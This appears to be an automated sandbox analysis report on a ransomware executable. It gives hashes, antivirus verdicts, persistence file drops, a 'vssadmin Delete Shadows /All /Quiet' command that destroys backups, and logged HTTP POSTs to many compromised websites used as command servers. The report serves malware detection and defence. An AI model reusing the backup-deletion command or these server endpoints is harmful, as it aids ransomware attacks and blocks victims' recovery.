Analysis Date2015-10-11 12:25:24
MD5859da4c7f04d296bd1af6fc301170e51
SHA152ebf387bff9fc2f093949933638d3608c9686b2

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: b38bddafa9117b461de446d091bc89d9 sha1: a310b9ab4ac10d5e89770a37ae0d9b3e569f54f5 size: 37888
Section.rdata md5: 4fa2f3bdd4a44021ee31115301909391 sha1: 2c0dea60589abbe4b6e4df8d02af0ae4590553a3 size: 9216
Section.data md5: 59eb389e1d09d8da664dc4642ba2a769 sha1: c5f3df481305ccb2e19b48d68abf5a91767bc4ec size: 4096
Section.sery md5: f22ce7de8d17e52964e1e36c72476724 sha1: 49076e019acf5284ba22b7c53fd117989c8ca332 size: 91648
Section.rsrc md5: 26957eef15928a163ab3ccebe4ba9279 sha1: edcdd69da9ad6cc62edda6826e25c65efe5feb20 size: 1024
Section.reloc md5: 3be83c530b8fdd533e5ee992bcdc8057 sha1: 9145c57e982b6a946aa5aa2e0f09f15ef49b6a64 size: 4096
Timestamp2015-09-18 01:30:20
VersionCompanyName: eryuyjgfzsetru
PackerMicrosoft Visual C++ ?.?
PEhash0bd5069a51fef638b507da1074f16bb0099630b0
IMPhash4377aaa6a401474e8270aef3a4b4071f
AVArcabit (arcavir)Trojan.GenericKD.2734312
AVPadvishno_virus
AVDr. WebTrojan.DownLoader16.31462
AVIkarusTrojan.Win32.Tobfy
AVMicrosoft Security EssentialsRansom:Win32/Crowti
AVZillya!Trojan.Cryptodef.Win32.1464
AVMalwareBytesTrojan.Crypt
AVTrend MicroRansom_.0A217DD0
AVAuthentiumW32/Trojan.OPXS-1097
AVFortinetW32/Cryptodef.DI!tr
AVEset (nod32)Win32/Kryptik.DXJF
AVMcafeeGamarue-FCX!859DA4C7F04D
AVAvira (antivir)TR/Crypt.Xpack.279424
AVGrisoft (avg)Crypt4.CKBV
AVCAT (quickheal)no_virus
AVRisingno_virus
AVAlwil (avast)Trojan-gen:Win32:Trojan-gen
AVVirusBlokAda (vba32)no_virus
AVTwisterTrojan.Girtk.DXJF.bmlz
AVF-SecureTrojan.GenericKD.2734312
AVBullGuardTrojan.GenericKD.2734312
AVEmsisoftTrojan.GenericKD.2734312
AVBitDefenderTrojan.GenericKD.2734312
AVSymantecno_virus
AVClamAVno_virus
AVFrisk (f-prot)no_virus
AVAd-AwareTrojan.GenericKD.2734312
AVMicroWorld (escan)Trojan.GenericKD.2734312
AVKasperskyTrojan-Ransom.Win32.Cryptodef.ywe
AVCA (E-Trust Ino)no_virus
AVK7Trojan ( 004cfc371 )

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates FileC:\6ff06165\6ff06165.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Processvssadmin.exe Delete Shadows /All /Quiet
Creates Process-k netsvcs

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSslaughtertime.com
Winsock DNSleicesterholmeproject.co.uk
Winsock DNSmisja52.com
Winsock DNShechtelshobbycenter.be
Winsock DNSevolvingcareers.co.uk
Winsock DNSeshraqatee.com
Winsock DNSreynelgonzalez.com
Winsock DNSfundmymission.org
Winsock DNSveloelectric.com.au
Winsock DNSzeitcreative.com
Winsock DNSsabeehah.com
Winsock DNShhydrovac.ca
Winsock DNSfan-out.com
Winsock DNScurlmyip.com
Winsock DNSmineralesdelsur.com
Winsock DNSdeicapelli.it
Winsock DNSintellicus.com
Winsock DNSfoundersomaha.net
Winsock DNSfabconcepts.net
Winsock DNSgeopowercables.com
Winsock DNSmyexternalip.com
Winsock DNSgoodtalk.info
Winsock DNSftpsecurityservices.com
Winsock DNSkoerper-modellage.de
Winsock DNSlinkcorphk.com
Winsock DNSip-addr.es
Winsock DNSspoilrotn.com
Winsock DNSmedicalmarijuanamiamiflorida.com
Winsock DNSewineco.com
Winsock DNSexternalbatterycase.com
Winsock DNSbuonatale.com
Winsock DNSespecializaciondigital.com
Winsock DNShurt911morrow.com
Winsock DNSmonarchestatemanagement.com
Winsock DNSmedulaosea.net
Winsock DNSgeorgiainjurycenters.com
Winsock DNSsnakebid.com
Winsock DNShagginhosp.com
Winsock DNSsmkcpaky.com
Winsock DNSheadline365.com
Winsock DNSchicanoymenarguez.com
Winsock DNSgreenevap.com
Winsock DNSroyalworldtours.in
Winsock DNStruereno.com
Winsock DNSfoxycalendargirls.com

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSip-addr.es
Type: A
188.165.164.184
DNSmyexternalip.com
Type: A
78.47.139.102
DNScurlmyip.com
Type: A
184.106.112.172
DNSbuonatale.com
Type: A
80.88.88.152
DNSmineralesdelsur.com
Type: A
192.254.233.175
DNShagginhosp.com
Type: A
184.168.26.1
DNSlinkcorphk.com
Type: A
188.121.47.1
DNSsmkcpaky.com
Type: A
50.62.69.1
DNSgeopowercables.com
Type: A
107.180.44.125
DNSfundmymission.org
Type: A
184.168.221.44
DNSzeitcreative.com
Type: A
192.185.48.135
DNSreynelgonzalez.com
Type: A
192.254.233.175
DNSespecializaciondigital.com
Type: A
192.254.233.175
DNSveloelectric.com.au
Type: A
106.187.103.246
DNSslaughtertime.com
Type: A
173.234.209.98
DNSgoodtalk.info
Type: A
128.140.220.8
DNSgreenevap.com
Type: A
50.63.95.1
DNSewineco.com
Type: A
192.186.235.6
DNSftpsecurityservices.com
Type: A
107.180.26.90
DNSfoxycalendargirls.com
Type: A
192.254.186.154
DNShurt911morrow.com
Type: A
184.168.19.1
DNStruereno.com
Type: A
69.163.208.246
DNSmonarchestatemanagement.com
Type: A
72.167.131.9
DNSexternalbatterycase.com
Type: A
192.186.222.229
DNSeshraqatee.com
Type: A
107.180.4.26
DNSevolvingcareers.co.uk
Type: A
188.121.47.1
DNSgeorgiainjurycenters.com
Type: A
184.168.19.1
DNSmedicalmarijuanamiamiflorida.com
Type: A
50.62.104.1
DNSfabconcepts.net
Type: A
107.180.4.133
DNShechtelshobbycenter.be
Type: A
62.182.61.62
DNSintellicus.com
Type: A
216.38.129.210
DNSsnakebid.com
Type: A
69.197.163.146
DNSroyalworldtours.in
Type: A
192.232.219.235
DNSspoilrotn.com
Type: A
184.168.19.1
DNSfoundersomaha.net
Type: A
50.63.42.1
DNSfan-out.com
Type: A
50.62.245.1
DNSsabeehah.com
Type: A
188.121.47.1
DNSmisja52.com
Type: A
178.255.42.139
DNSchicanoymenarguez.com
Type: A
185.14.56.94
DNSheadline365.com
Type: A
173.234.209.98
DNSleicesterholmeproject.co.uk
Type: A
188.121.47.1
DNSkoerper-modellage.de
Type: A
87.106.167.110
DNSdeicapelli.it
Type: A
62.149.226.198
DNShhydrovac.ca
Type: A
107.180.44.135
DNSmedulaosea.net
Type: A
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://buonatale.com/ilario_bordoni/assets/images/1.php?h=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mineralesdelsur.com/wp-includes/js/jcrop/2.php?q=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hagginhosp.com/hagg2013/wp-includes/theme-compat/ap3.php?k=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://linkcorphk.com/js-js/5.php?q=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://smkcpaky.com/pdf/3.php?b=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://geopowercables.com/wp-admin/user/ap1.php?h=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fundmymission.org/wp-includes/theme-compat/ap5.php?f=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://zeitcreative.com/cgi-bin/3.php?w=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://reynelgonzalez.com/compras/image/data/1.php?b=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://especializaciondigital.com/new/wp-includes/js/jcrop/5.php?z=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://veloelectric.com.au/wp-includes/js/tinymce/skins/wordpress/images/1.php?i=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://slaughtertime.com/wp-content/themes/blogoma/inc/blogoma-admin/options/validation/str_replace/3.php?l=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://goodtalk.info/Wp/wp-content/plugins/wp-wizard-cloak/static/js/jquery/farbtastic/5.php?y=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://greenevap.com/mtqzpa/templates/ap5.php?k=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ewineco.com/wp-admin/network/ap5.php?y=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ftpsecurityservices.com/wp-admin/images/ap2.php?w=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://foxycalendargirls.com/wp-content/plugins/jetpack/modules/publicize/assets/rtl/4.php?f=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hurt911morrow.com/wp-content/uploads/2013/12/2.php?z=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://truereno.com/flamingo/wp-content/plugins/jetpack/modules/shortcodes/css/rtl/2.php?p=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://monarchestatemanagement.com/m/images/1.php?e=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://externalbatterycase.com/wp-admin/js/ap4.php?r=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eshraqatee.com/wp-includes/css/ap1.php?m=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://evolvingcareers.co.uk/images/prettyPhoto/light_square/4.php?g=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://evolvingcareers.co.uk/images/prettyPhoto/light_square/ap1.php?e=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://georgiainjurycenters.com/backups_georgia/back%2007102014/ap4.php?t=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://medicalmarijuanamiamiflorida.com/4.php?b=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fabconcepts.net/wp-content/plugins/indonez-shortcodes/js/ap3.php?j=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hechtelshobbycenter.be/components/com_jce/editor/tiny_mce/plugins/mediamanager/classes/getid3/2.php?k=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://intellicus.com/wp-content/uploads/gravity_forms/6-55cd98d82aec1ece039f3a32332929d1/tmp/3.php?a=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://snakebid.com/wp-content/themes/point/options/fields/radio/4.php?l=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://royalworldtours.in/js/2.php?s=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://spoilrotn.com/4.php?s=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://foundersomaha.net/wp-includes/Text/Diff/Renderer/ap3.php?n=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fan-out.com/wp-includes/fonts/ap5.php?a=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://sabeehah.com/images/Image/2.php?u=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://misja52.com/wp-content/plugins/iphorm-form-builder/js/jqueryui/themes/blitzer/images/1.php?q=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://chicanoymenarguez.com/wp-content/plugins/js_composer/assets/css/lib/vc-linecons/fonts/2.php?o=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mineralesdelsur.com/wp-includes/js/jcrop/3.php?d=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://headline365.com/heelziggler.com/wp-content/plugins/siteorigin-panels/widgets/widgets/call-to-action/presets/1.php?d=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://leicesterholmeproject.co.uk/js-js/1.php?c=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://koerper-modellage.de/phpSitemapNG/inc/gsgxml/4.php?h=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://deicapelli.it/wp-content/plugins/wordpress-seo/vendor/composer/installers/tests/Composer/3.php?v=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hhydrovac.ca/ap1.php?y=0idicyfxkab
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://buonatale.com/ilario_bordoni/assets/images/1.php?p=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mineralesdelsur.com/wp-includes/js/jcrop/2.php?d=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hagginhosp.com/hagg2013/wp-includes/theme-compat/ap3.php?u=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://linkcorphk.com/js-js/5.php?x=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://smkcpaky.com/pdf/3.php?l=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://geopowercables.com/wp-admin/user/ap1.php?a=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fundmymission.org/wp-includes/theme-compat/ap5.php?j=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://zeitcreative.com/cgi-bin/3.php?s=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://reynelgonzalez.com/compras/image/data/1.php?m=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://especializaciondigital.com/new/wp-includes/js/jcrop/5.php?t=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://veloelectric.com.au/wp-includes/js/tinymce/skins/wordpress/images/1.php?s=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://slaughtertime.com/wp-content/themes/blogoma/inc/blogoma-admin/options/validation/str_replace/3.php?l=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://goodtalk.info/Wp/wp-content/plugins/wp-wizard-cloak/static/js/jquery/farbtastic/5.php?u=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://greenevap.com/mtqzpa/templates/ap5.php?r=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ewineco.com/wp-admin/network/ap5.php?q=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ftpsecurityservices.com/wp-admin/images/ap2.php?d=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://foxycalendargirls.com/wp-content/plugins/jetpack/modules/publicize/assets/rtl/4.php?c=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hurt911morrow.com/wp-content/uploads/2013/12/2.php?r=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://truereno.com/flamingo/wp-content/plugins/jetpack/modules/shortcodes/css/rtl/2.php?p=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://monarchestatemanagement.com/m/images/1.php?a=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://externalbatterycase.com/wp-admin/js/ap4.php?z=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eshraqatee.com/wp-includes/css/ap1.php?h=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://evolvingcareers.co.uk/images/prettyPhoto/light_square/4.php?f=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://evolvingcareers.co.uk/images/prettyPhoto/light_square/ap1.php?g=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://georgiainjurycenters.com/backups_georgia/back%2007102014/ap4.php?l=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://medicalmarijuanamiamiflorida.com/4.php?w=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fabconcepts.net/wp-content/plugins/indonez-shortcodes/js/ap3.php?v=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hechtelshobbycenter.be/components/com_jce/editor/tiny_mce/plugins/mediamanager/classes/getid3/2.php?x=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://intellicus.com/wp-content/uploads/gravity_forms/6-55cd98d82aec1ece039f3a32332929d1/tmp/3.php?y=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://snakebid.com/wp-content/themes/point/options/fields/radio/4.php?o=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://royalworldtours.in/js/2.php?q=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://spoilrotn.com/4.php?e=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://foundersomaha.net/wp-includes/Text/Diff/Renderer/ap3.php?a=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fan-out.com/wp-includes/fonts/ap5.php?a=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://sabeehah.com/images/Image/2.php?s=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://misja52.com/wp-content/plugins/iphorm-form-builder/js/jqueryui/themes/blitzer/images/1.php?x=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://chicanoymenarguez.com/wp-content/plugins/js_composer/assets/css/lib/vc-linecons/fonts/2.php?w=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mineralesdelsur.com/wp-includes/js/jcrop/3.php?b=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://headline365.com/heelziggler.com/wp-content/plugins/siteorigin-panels/widgets/widgets/call-to-action/presets/1.php?k=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://leicesterholmeproject.co.uk/js-js/1.php?y=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://koerper-modellage.de/phpSitemapNG/inc/gsgxml/4.php?h=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://deicapelli.it/wp-content/plugins/wordpress-seo/vendor/composer/installers/tests/Composer/3.php?b=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hhydrovac.ca/ap1.php?y=eiiickf5lffomw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1034 ➝ 80.88.88.152:80
Flows TCP192.168.1.1:1035 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1036 ➝ 184.168.26.1:80
Flows TCP192.168.1.1:1037 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1038 ➝ 50.62.69.1:80
Flows TCP192.168.1.1:1039 ➝ 107.180.44.125:80
Flows TCP192.168.1.1:1040 ➝ 184.168.221.44:80
Flows TCP192.168.1.1:1041 ➝ 192.185.48.135:80
Flows TCP192.168.1.1:1042 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1043 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1044 ➝ 106.187.103.246:80
Flows TCP192.168.1.1:1045 ➝ 173.234.209.98:80
Flows TCP192.168.1.1:1046 ➝ 128.140.220.8:80
Flows TCP192.168.1.1:1047 ➝ 50.63.95.1:80
Flows TCP192.168.1.1:1048 ➝ 192.186.235.6:80
Flows TCP192.168.1.1:1049 ➝ 107.180.26.90:80
Flows TCP192.168.1.1:1050 ➝ 192.254.186.154:80
Flows TCP192.168.1.1:1051 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1052 ➝ 69.163.208.246:80
Flows TCP192.168.1.1:1053 ➝ 72.167.131.9:80
Flows TCP192.168.1.1:1054 ➝ 192.186.222.229:80
Flows TCP192.168.1.1:1055 ➝ 107.180.4.26:80
Flows TCP192.168.1.1:1056 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1057 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1058 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1059 ➝ 50.62.104.1:80
Flows TCP192.168.1.1:1060 ➝ 107.180.4.133:80
Flows TCP192.168.1.1:1061 ➝ 62.182.61.62:80
Flows TCP192.168.1.1:1062 ➝ 216.38.129.210:80
Flows TCP192.168.1.1:1063 ➝ 69.197.163.146:80
